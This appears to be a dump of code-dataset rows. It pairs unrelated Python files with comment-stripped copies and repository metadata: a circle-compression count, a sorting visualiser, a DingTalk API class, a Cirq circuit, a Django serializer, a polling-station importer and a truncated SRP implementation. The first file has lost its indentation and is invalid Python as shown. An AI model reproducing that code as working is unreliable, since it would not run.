# yields the same result when the range is replaced with [-xend + 1, -xstart + 1).
# Hence by symmetry, we can only consider cases where 0 <= xstart < xend,
# and not deal with negative ranges. This optimized bit length algorithm can
# no longer be adapted to encode the actual compressed bit stream, however.
def compute():
N = 24
RADIUS_SQUARED = 2**(2 * N - 2)
# Returns the exact minimum number of bits required to encode
# the circle image's region of [xstart, end) * [ystart, yend),
# requiring 0 <= xstart < xend and 0 <= ystart < yend.
def compressed_length(xstart, xend, ystart, yend):
if xstart * xstart + ystart * ystart > RADIUS_SQUARED: # All white
return 2
elif (xend - 1) * (xend - 1) + (yend - 1) * (yend - 1) <= RADIUS_SQUARED: # All black
return 2
else: # Subdivide and recurse
xmid = (xstart + xend) >> 1
ymid = (ystart + yend) >> 1
return (1 +
compressed_length(xstart, xmid, ymid , yend) + # Top left
compressed_length(xmid , xend, ymid , yend) + # Top right
compressed_length(xstart, xmid, ystart, ymid) + # Bottom left
compressed_length(xmid , xend, ystart, ymid)) # Bottom right
temp = 2**(N - 1)
return str(1 +
compressed_length(0, temp, 0, temp) +
compressed_length(0, temp, 1, temp + 1) +
compressed_length(1, temp + 1, 0, temp) +
compressed_length(1, temp + 1, 1, temp + 1))
if __name__ == "__main__":
print(compute())
| 47.935897 | 95 | 0.682268 |
def compute():
N = 24
RADIUS_SQUARED = 2**(2 * N - 2)
# requiring 0 <= xstart < xend and 0 <= ystart < yend.
def compressed_length(xstart, xend, ystart, yend):
if xstart * xstart + ystart * ystart > RADIUS_SQUARED: # All white
return 2
elif (xend - 1) * (xend - 1) + (yend - 1) * (yend - 1) <= RADIUS_SQUARED: # All black
return 2
else: # Subdivide and recurse
xmid = (xstart + xend) >> 1
ymid = (ystart + yend) >> 1
return (1 +
compressed_length(xstart, xmid, ymid , yend) + # Top left
compressed_length(xmid , xend, ymid , yend) + # Top right
compressed_length(xstart, xmid, ystart, ymid) + # Bottom left
compressed_length(xmid , xend, ystart, ymid)) # Bottom right
temp = 2**(N - 1)
return str(1 +
compressed_length(0, temp, 0, temp) +
compressed_length(0, temp, 1, temp + 1) +
compressed_length(1, temp + 1, 0, temp) +
compressed_length(1, temp + 1, 1, temp + 1))
if __name__ == "__main__":
print(compute())
| true | true |
790112e17cfb3b5d10e1f0b58ddb487cbd6dffba | 1,540 | py | Python | 07-programasDeAlgoritmo/1-programaDeAlgoritmoTipo1/0versoesAntigas/9-programa/algoritmo2.py | jonasht/Python | 2affe509ce9619f745ee645ff3a120485bf403bc | [
"MIT"
] | null | null | null | 07-programasDeAlgoritmo/1-programaDeAlgoritmoTipo1/0versoesAntigas/9-programa/algoritmo2.py | jonasht/Python | 2affe509ce9619f745ee645ff3a120485bf403bc | [
"MIT"
] | null | null | null | 07-programasDeAlgoritmo/1-programaDeAlgoritmoTipo1/0versoesAntigas/9-programa/algoritmo2.py | jonasht/Python | 2affe509ce9619f745ee645ff3a120485bf403bc | [
"MIT"
] | null | null | null | from interface import *
class M2:
interface = Interface()
def __init__(self, tamanhoDaLista, tempoDeAtraso, charPixel = ' '):
self.guardarNumero = 0
self.interface.set_tamanhoDaLista(tamanhoDaLista)
self.interface.set_tempoDeAtraso(tempoDeAtraso)
self.interface.set_charPixel(charPixel)
def Maneira2(self):
self.guardarNumero
for c in range(len(self.interface.lista)):
for i in range(len(self.interface.lista)):
if i+1 == len(self.interface.lista):
continue
else:
if self.interface.lista[i] > self.interface.lista[i+1]:
guardarNumero = self.interface.lista[i]
self.interface.lista[i] = self.interface.lista[i+1]
self.interface.lista[i+1] = guardarNumero
self.interface.converterPMostrar(i+1)
for i in reversed(range(len(self.interface.lista))):
if i+1 == len(self.interface.lista):
continue
else:
if self.interface.lista[i] > self.interface.lista[i+1]:
guardarNumero = self.interface.lista[i]
self.interface.lista[i] = self.interface.lista[i+1]
self.interface.lista[i+1] = guardarNumero
self.interface.converterPMostrar(i)
| 37.560976 | 83 | 0.518831 | from interface import *
class M2:
interface = Interface()
def __init__(self, tamanhoDaLista, tempoDeAtraso, charPixel = ' '):
self.guardarNumero = 0
self.interface.set_tamanhoDaLista(tamanhoDaLista)
self.interface.set_tempoDeAtraso(tempoDeAtraso)
self.interface.set_charPixel(charPixel)
def Maneira2(self):
self.guardarNumero
for c in range(len(self.interface.lista)):
for i in range(len(self.interface.lista)):
if i+1 == len(self.interface.lista):
continue
else:
if self.interface.lista[i] > self.interface.lista[i+1]:
guardarNumero = self.interface.lista[i]
self.interface.lista[i] = self.interface.lista[i+1]
self.interface.lista[i+1] = guardarNumero
self.interface.converterPMostrar(i+1)
for i in reversed(range(len(self.interface.lista))):
if i+1 == len(self.interface.lista):
continue
else:
if self.interface.lista[i] > self.interface.lista[i+1]:
guardarNumero = self.interface.lista[i]
self.interface.lista[i] = self.interface.lista[i+1]
self.interface.lista[i+1] = guardarNumero
self.interface.converterPMostrar(i)
| true | true |
790113315ce4aa4ae68f9d7785b54a2d40e710ea | 361 | py | Python | other/dingding/dingtalk/api/rest/OapiCateringUnfreezeRequest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/rest/OapiCateringUnfreezeRequest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/rest/OapiCateringUnfreezeRequest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | '''
Created by auto_sdk on 2021.03.10
'''
from dingtalk.api.base import RestApi
class OapiCateringUnfreezeRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.order_id = None
self.rule_code = None
self.userid = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.catering.unfreeze'
| 21.235294 | 43 | 0.747922 | from dingtalk.api.base import RestApi
class OapiCateringUnfreezeRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.order_id = None
self.rule_code = None
self.userid = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.catering.unfreeze'
| true | true |
790113e7815d2c7812f36d9d8f3b5e1d1896e669 | 2,341 | py | Python | data/cirq_new/cirq_program/startCirq_Class840.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_Class840.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_Class840.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=25
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=7
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.H.on(input_qubit[0])) # number=18
c.append(cirq.CZ.on(input_qubit[3],input_qubit[0])) # number=19
c.append(cirq.H.on(input_qubit[0])) # number=20
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=22
c.append(cirq.X.on(input_qubit[2])) # number=23
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=24
c.append(cirq.H.on(input_qubit[0])) # number=10
c.append(cirq.CZ.on(input_qubit[3],input_qubit[0])) # number=11
c.append(cirq.H.on(input_qubit[0])) # number=12
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=8
c.append(cirq.H.on(input_qubit[0])) # number=13
c.append(cirq.CZ.on(input_qubit[2],input_qubit[0])) # number=14
c.append(cirq.H.on(input_qubit[0])) # number=15
c.append(cirq.X.on(input_qubit[2])) # number=16
c.append(cirq.X.on(input_qubit[2])) # number=17
# circuit end
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =0
info = cirq.final_state_vector(circuit)
qubits = round(log2(len(info)))
frequencies = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
writefile = open("../data/startCirq_Class840.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | 32.068493 | 80 | 0.668518 |
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
def make_circuit(n: int, input_qubit):
c = cirq.Circuit()
c.append(cirq.H.on(input_qubit[0]))
c.append(cirq.H.on(input_qubit[1]))
c.append(cirq.H.on(input_qubit[1]))
c.append(cirq.H.on(input_qubit[2]))
c.append(cirq.H.on(input_qubit[3]))
c.append(cirq.H.on(input_qubit[0]))
c.append(cirq.CZ.on(input_qubit[3],input_qubit[0]))
c.append(cirq.H.on(input_qubit[0]))
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
c.append(cirq.X.on(input_qubit[2]))
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
c.append(cirq.H.on(input_qubit[0]))
c.append(cirq.CZ.on(input_qubit[3],input_qubit[0]))
c.append(cirq.H.on(input_qubit[0]))
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0]))
c.append(cirq.H.on(input_qubit[0]))
c.append(cirq.CZ.on(input_qubit[2],input_qubit[0]))
c.append(cirq.H.on(input_qubit[0]))
c.append(cirq.X.on(input_qubit[2]))
c.append(cirq.X.on(input_qubit[2]))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =0
info = cirq.final_state_vector(circuit)
qubits = round(log2(len(info)))
frequencies = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
writefile = open("../data/startCirq_Class840.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | true | true |
7901144608dc0639a38b27d7fe8ce58d40d01b0a | 1,315 | py | Python | server/gestion/serializers/providerOrderSerializer.py | JetLightStudio/Jet-Gest-stock-management | 333cbc3dd1b379f53f67250fbd581cbce8e20ca8 | [
"MIT"
] | 1 | 2021-08-18T18:53:02.000Z | 2021-08-18T18:53:02.000Z | server/gestion/serializers/providerOrderSerializer.py | JetLightStudio/Jet-Gest-stock-management | 333cbc3dd1b379f53f67250fbd581cbce8e20ca8 | [
"MIT"
] | null | null | null | server/gestion/serializers/providerOrderSerializer.py | JetLightStudio/Jet-Gest-stock-management | 333cbc3dd1b379f53f67250fbd581cbce8e20ca8 | [
"MIT"
] | 1 | 2021-08-04T23:53:52.000Z | 2021-08-04T23:53:52.000Z | from rest_framework import serializers
from gestion.models.providerOrder import ProviderOrder
from auth_app.serializers.userSerializer import UserSerializer
from gestion.serializers.providerSerializer import ProviderSerializer
from auth_app.models.user import User
from gestion.models.provider import Provider
from serverConfig.utils import check_user_has_permission
class ProviderOrderSerializer(serializers.ModelSerializer):
seller = UserSerializer(read_only=True)
provider = ProviderSerializer(read_only=True)
orderList = serializers.SerializerMethodField("getOrderList", required=False)
orderNumber = serializers.SerializerMethodField(read_only=False, required=False)
class Meta:
model = ProviderOrder
fields = ('__all__')
def create(self, validated_data):
order = ProviderOrder.objects.create(**validated_data)
return order
def update(self, instance, validated_data):
return super().update(instance, validated_data)
def getOrderList(self, obj):
from .entriesSerializer import EntriesSerializer
return EntriesSerializer(obj.orderList(), context=self.context, many=True).data
def get_orderNumber(self, obj: ProviderOrder):
return str(obj.id).zfill(5) | 34.605263 | 88 | 0.742205 | from rest_framework import serializers
from gestion.models.providerOrder import ProviderOrder
from auth_app.serializers.userSerializer import UserSerializer
from gestion.serializers.providerSerializer import ProviderSerializer
from auth_app.models.user import User
from gestion.models.provider import Provider
from serverConfig.utils import check_user_has_permission
class ProviderOrderSerializer(serializers.ModelSerializer):
seller = UserSerializer(read_only=True)
provider = ProviderSerializer(read_only=True)
orderList = serializers.SerializerMethodField("getOrderList", required=False)
orderNumber = serializers.SerializerMethodField(read_only=False, required=False)
class Meta:
model = ProviderOrder
fields = ('__all__')
def create(self, validated_data):
order = ProviderOrder.objects.create(**validated_data)
return order
def update(self, instance, validated_data):
return super().update(instance, validated_data)
def getOrderList(self, obj):
from .entriesSerializer import EntriesSerializer
return EntriesSerializer(obj.orderList(), context=self.context, many=True).data
def get_orderNumber(self, obj: ProviderOrder):
return str(obj.id).zfill(5) | true | true |
790114aa0c0efff55f9d68a6bd2bd3434ece70e4 | 472 | py | Python | interpolate_example.py | anntzer/structured-docstrings | 1de0e3458d04723e6fdbca0367a82434b2843f3b | [
"MIT"
] | 1 | 2019-07-20T15:22:19.000Z | 2019-07-20T15:22:19.000Z | interpolate_example.py | anntzer/structured-docstrings | 1de0e3458d04723e6fdbca0367a82434b2843f3b | [
"MIT"
] | null | null | null | interpolate_example.py | anntzer/structured-docstrings | 1de0e3458d04723e6fdbca0367a82434b2843f3b | [
"MIT"
] | null | null | null | from interpolate import interpolate_doc
foo = """
hello
world
"""
bar = "foo bar\nbaz"
class Foo:
# cf matplotlib's kwdoc.
__kw__ = "the kw of foo"
@interpolate_doc
def func():
"""
this is a docstring
{interpolate_example.foo}
{bar}
{Foo!K}
"""
try:
@interpolate_doc
def bad_doc():
"""
fields {must} be preceded by whitespace
"""
except ValueError:
print("error correctly caught")
| 12.756757 | 47 | 0.576271 | from interpolate import interpolate_doc
foo = """
hello
world
"""
bar = "foo bar\nbaz"
class Foo:
__kw__ = "the kw of foo"
@interpolate_doc
def func():
try:
@interpolate_doc
def bad_doc():
except ValueError:
print("error correctly caught")
| true | true |
790114b62661448156a89416653afbbad7a619d7 | 1,346 | py | Python | polling_stations/apps/data_importers/management/commands/import_epsom_and_ewell.py | smsmith97/UK-Polling-Stations | ecbd98cb99e89e97354da3960b0063aa36181b11 | [
"BSD-3-Clause"
] | 29 | 2015-03-10T08:41:34.000Z | 2022-01-12T08:51:38.000Z | polling_stations/apps/data_importers/management/commands/import_epsom_and_ewell.py | smsmith97/UK-Polling-Stations | ecbd98cb99e89e97354da3960b0063aa36181b11 | [
"BSD-3-Clause"
] | 4,112 | 2015-04-01T21:27:38.000Z | 2022-03-31T19:22:11.000Z | polling_stations/apps/data_importers/management/commands/import_epsom_and_ewell.py | smsmith97/UK-Polling-Stations | ecbd98cb99e89e97354da3960b0063aa36181b11 | [
"BSD-3-Clause"
] | 31 | 2015-03-18T14:52:50.000Z | 2022-02-24T10:31:07.000Z | from data_importers.github_importer import BaseGitHubImporter
class Command(BaseGitHubImporter):
srid = 27700
districts_srid = 27700
council_id = "EPS"
elections = ["2021-05-06"]
scraper_name = "wdiv-scrapers/DC-PollingStations-EpsomAndEwell"
geom_type = "gml"
seen = set()
def district_record_to_dict(self, record):
poly = self.extract_geometry(record, self.geom_type, self.get_srid("districts"))
if record["id"] in [
"pollingdistricts.33",
"pollingdistricts.38",
"pollingdistricts.50",
]:
return None
return {
"internal_council_id": record["district"],
"name": record["district"],
"area": poly,
}
def station_record_to_dict(self, record):
postcode = " ".join(record["address"].split(" ")[-2:])
point = self.extract_geometry(record, self.geom_type, self.get_srid())
if (record["district"], postcode) in self.seen:
return None
else:
self.seen.add((record["district"], postcode))
return {
"internal_council_id": record["psnumber"],
"polling_district_id": record["district"],
"address": record["address"],
"postcode": postcode,
"location": point,
}
| 30.590909 | 88 | 0.581724 | from data_importers.github_importer import BaseGitHubImporter
class Command(BaseGitHubImporter):
srid = 27700
districts_srid = 27700
council_id = "EPS"
elections = ["2021-05-06"]
scraper_name = "wdiv-scrapers/DC-PollingStations-EpsomAndEwell"
geom_type = "gml"
seen = set()
def district_record_to_dict(self, record):
poly = self.extract_geometry(record, self.geom_type, self.get_srid("districts"))
if record["id"] in [
"pollingdistricts.33",
"pollingdistricts.38",
"pollingdistricts.50",
]:
return None
return {
"internal_council_id": record["district"],
"name": record["district"],
"area": poly,
}
def station_record_to_dict(self, record):
postcode = " ".join(record["address"].split(" ")[-2:])
point = self.extract_geometry(record, self.geom_type, self.get_srid())
if (record["district"], postcode) in self.seen:
return None
else:
self.seen.add((record["district"], postcode))
return {
"internal_council_id": record["psnumber"],
"polling_district_id": record["district"],
"address": record["address"],
"postcode": postcode,
"location": point,
}
| true | true |
7901160068a3177560677e18df2d12b7cca78efa | 9,763 | py | Python | homekit/crypto/srp.py | kvaellning/homekit_python | 88e507541bbab7d662d7bf41e452f99540ac850e | [
"Apache-2.0"
] | 3 | 2017-08-01T17:45:58.000Z | 2017-08-12T07:41:53.000Z | homekit/crypto/srp.py | jlusiardi/homekit_client | b7d9fe730159ec90bf7a82010150d38112d4b1fc | [
"Apache-2.0"
] | null | null | null | homekit/crypto/srp.py | jlusiardi/homekit_client | b7d9fe730159ec90bf7a82010150d38112d4b1fc | [
"Apache-2.0"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# Copyright 2018 Joachim Lusiardi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Implements the Secure Remote Password (SRP) algorithm. More information can be found on
https://tools.ietf.org/html/rfc5054. See HomeKit spec page 36 for adjustments imposed by Apple.
"""
import math
import hashlib
import os
class Srp:
def __init__(self):
# generator as defined by 3072bit group of RFC 5054
self.g = int(b'5', 16)
# modulus as defined by 3072bit group of RFC 5054
self.n = int(b'''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E08\
8A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B\
302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9\
A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE6\
49286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8\
FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D\
670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C\
180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718\
3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7D\
B3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D226\
1AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200C\
BBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFC\
E0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF''', 16)
# HomeKit requires SHA-512 (See page 36)
self.h = hashlib.sha512
self.A = None
self.B = None
self.salt = None
self.username = None
self.password = None
@staticmethod
def generate_private_key():
"""
Static function to generate a 16 byte random key.
:return: the key as an integer
"""
# see
# - https://github.com/jlusiardi/homekit_python/issues/185#issuecomment-616344895 and
# - https://cryptography.io/en/latest/random-numbers/
return int.from_bytes(os.urandom(16), byteorder="big")
def _calculate_k(self) -> int:
# calculate k (see https://tools.ietf.org/html/rfc5054#section-2.5.3)
hash_instance = self.h()
n = Srp.to_byte_array(self.n)
g = bytearray.fromhex((383 * '00' + '05')) # 383 * b'0' + '5'.encode()
hash_instance.update(n)
hash_instance.update(g)
k = int.from_bytes(hash_instance.digest(), "big")
return k
def _calculate_u(self) -> int:
if self.A is None:
raise RuntimeError('Client\'s public key is missing')
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
hash_instance = self.h()
A_b = Srp.to_byte_array(self.A)
B_b = Srp.to_byte_array(self.B)
hash_instance.update(A_b)
hash_instance.update(B_b)
u = int.from_bytes(hash_instance.digest(), "big")
return u
def get_session_key(self) -> int:
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.get_shared_secret()))
hash_value = int.from_bytes(hash_instance.digest(), "big")
return hash_value
@staticmethod
def to_byte_array(num: int) -> bytearray:
return bytearray(num.to_bytes(int(math.ceil(num.bit_length() / 8)), "big"))
def _calculate_x(self) -> int:
i = (self.username + ':' + self.password).encode()
hash_instance = self.h()
hash_instance.update(i)
hash_value = hash_instance.digest()
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.salt))
hash_instance.update(hash_value)
return int.from_bytes(hash_instance.digest(), "big")
def get_shared_secret(self):
raise NotImplementedError()
class SrpClient(Srp):
"""
Implements all functions that are required to simulate an iOS HomeKit controller
"""
def __init__(self, username: str, password: str):
Srp.__init__(self)
self.username = username
self.password = password
self.salt = None
self.a = self.generate_private_key()
self.A = pow(self.g, self.a, self.n)
self.B = None
def set_salt(self, salt):
if isinstance(salt, bytearray) or isinstance(salt, bytes):
self.salt = int.from_bytes(salt, "big")
else:
self.salt = salt
def get_public_key(self):
return pow(self.g, self.a, self.n)
def set_server_public_key(self, B):
if isinstance(B, bytearray) or isinstance(B, bytes):
self.B = int.from_bytes(B, "big")
else:
self.B = B
def get_shared_secret(self):
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
u = self._calculate_u()
x = self._calculate_x()
k = self._calculate_k()
tmp1 = (self.B - (k * pow(self.g, x, self.n)))
tmp2 = (self.a + (u * x)) # % self.n
S = pow(tmp1, tmp2, self.n)
return S
def get_proof(self):
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.n))
hN = bytearray(hash_instance.digest())
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.g))
hg = bytearray(hash_instance.digest())
for index in range(0, len(hN)):
hN[index] ^= hg[index]
u = self.username.encode()
hash_instance = self.h()
hash_instance.update(u)
hu = hash_instance.digest()
K = Srp.to_byte_array(self.get_session_key())
hash_instance = self.h()
hash_instance.update(hN)
hash_instance.update(hu)
hash_instance.update(Srp.to_byte_array(self.salt))
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(self.B))
hash_instance.update(K)
return int.from_bytes(hash_instance.digest(), "big")
def verify_servers_proof(self, M):
if isinstance(M, bytearray) or isinstance(M, bytes):
tmp = int.from_bytes(M, "big")
else:
tmp = M
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(self.get_proof()))
hash_instance.update(Srp.to_byte_array(self.get_session_key()))
return tmp == int.from_bytes(hash_instance.digest(), "big")
class SrpServer(Srp):
"""
Implements all functions that are required to simulate an iOS HomeKit accessory
"""
def __init__(self, username, password):
Srp.__init__(self)
self.username = username
self.salt = SrpServer._create_salt()
self.password = password
self.verifier = self._get_verifier()
self.b = self.generate_private_key()
k = self._calculate_k()
g_b = pow(self.g, self.b, self.n)
self.B = (k * self.verifier + g_b) % self.n
self.A = None
@staticmethod
def _create_salt() -> int:
# see
# - https://github.com/jlusiardi/homekit_python/issues/185#issuecomment-616344895 and
# - https://cryptography.io/en/latest/random-numbers/
return int.from_bytes(os.urandom(16), byteorder="big")
def _get_verifier(self) -> int:
hash_value = self._calculate_x()
v = pow(self.g, hash_value, self.n)
return v
def set_client_public_key(self, A):
self.A = A
def get_salt(self):
return self.salt
def get_public_key(self):
k = self._calculate_k()
return (k * self.verifier + pow(self.g, self.b, self.n)) % self.n
def get_shared_secret(self):
if self.A is None:
raise RuntimeError('Client\'s public key is missing')
tmp1 = self.A * pow(self.verifier, self._calculate_u(), self.n)
return pow(tmp1, self.b, self.n)
def verify_clients_proof(self, m) -> bool:
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.n))
hN = bytearray(hash_instance.digest())
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.g))
hg = bytearray(hash_instance.digest())
for index in range(0, len(hN)):
hN[index] ^= hg[index]
u = self.username.encode()
hash_instance = self.h()
hash_instance.update(u)
hu = hash_instance.digest()
K = Srp.to_byte_array(self.get_session_key())
hash_instance = self.h()
hash_instance.update(hN)
hash_instance.update(hu)
hash_instance.update(Srp.to_byte_array(self.salt))
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(self.B))
hash_instance.update(K)
return m == int.from_bytes(hash_instance.digest(), "big")
def get_proof(self, m) -> int:
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(m))
hash_instance.update(Srp.to_byte_array(self.get_session_key()))
return int.from_bytes(hash_instance.digest(), "big")
| 34.743772 | 95 | 0.651029 |
import math
import hashlib
import os
class Srp:
def __init__(self):
self.g = int(b'5', 16)
self.n = int(b'''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E08\
8A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B\
302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9\
A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE6\
49286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8\
FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D\
670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C\
180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718\
3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7D\
B3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D226\
1AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200C\
BBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFC\
E0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF''', 16)
self.h = hashlib.sha512
self.A = None
self.B = None
self.salt = None
self.username = None
self.password = None
@staticmethod
def generate_private_key():
t.from_bytes(os.urandom(16), byteorder="big")
def _calculate_k(self) -> int:
nstance = self.h()
n = Srp.to_byte_array(self.n)
g = bytearray.fromhex((383 * '00' + '05'))
hash_instance.update(n)
hash_instance.update(g)
k = int.from_bytes(hash_instance.digest(), "big")
return k
def _calculate_u(self) -> int:
if self.A is None:
raise RuntimeError('Client\'s public key is missing')
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
hash_instance = self.h()
A_b = Srp.to_byte_array(self.A)
B_b = Srp.to_byte_array(self.B)
hash_instance.update(A_b)
hash_instance.update(B_b)
u = int.from_bytes(hash_instance.digest(), "big")
return u
def get_session_key(self) -> int:
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.get_shared_secret()))
hash_value = int.from_bytes(hash_instance.digest(), "big")
return hash_value
@staticmethod
def to_byte_array(num: int) -> bytearray:
return bytearray(num.to_bytes(int(math.ceil(num.bit_length() / 8)), "big"))
def _calculate_x(self) -> int:
i = (self.username + ':' + self.password).encode()
hash_instance = self.h()
hash_instance.update(i)
hash_value = hash_instance.digest()
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.salt))
hash_instance.update(hash_value)
return int.from_bytes(hash_instance.digest(), "big")
def get_shared_secret(self):
raise NotImplementedError()
class SrpClient(Srp):
def __init__(self, username: str, password: str):
Srp.__init__(self)
self.username = username
self.password = password
self.salt = None
self.a = self.generate_private_key()
self.A = pow(self.g, self.a, self.n)
self.B = None
def set_salt(self, salt):
if isinstance(salt, bytearray) or isinstance(salt, bytes):
self.salt = int.from_bytes(salt, "big")
else:
self.salt = salt
def get_public_key(self):
return pow(self.g, self.a, self.n)
def set_server_public_key(self, B):
if isinstance(B, bytearray) or isinstance(B, bytes):
self.B = int.from_bytes(B, "big")
else:
self.B = B
def get_shared_secret(self):
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
u = self._calculate_u()
x = self._calculate_x()
k = self._calculate_k()
tmp1 = (self.B - (k * pow(self.g, x, self.n)))
tmp2 = (self.a + (u * x)) # % self.n
S = pow(tmp1, tmp2, self.n)
return S
def get_proof(self):
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.n))
hN = bytearray(hash_instance.digest())
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.g))
hg = bytearray(hash_instance.digest())
for index in range(0, len(hN)):
hN[index] ^= hg[index]
u = self.username.encode()
hash_instance = self.h()
hash_instance.update(u)
hu = hash_instance.digest()
K = Srp.to_byte_array(self.get_session_key())
hash_instance = self.h()
hash_instance.update(hN)
hash_instance.update(hu)
hash_instance.update(Srp.to_byte_array(self.salt))
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(self.B))
hash_instance.update(K)
return int.from_bytes(hash_instance.digest(), "big")
def verify_servers_proof(self, M):
if isinstance(M, bytearray) or isinstance(M, bytes):
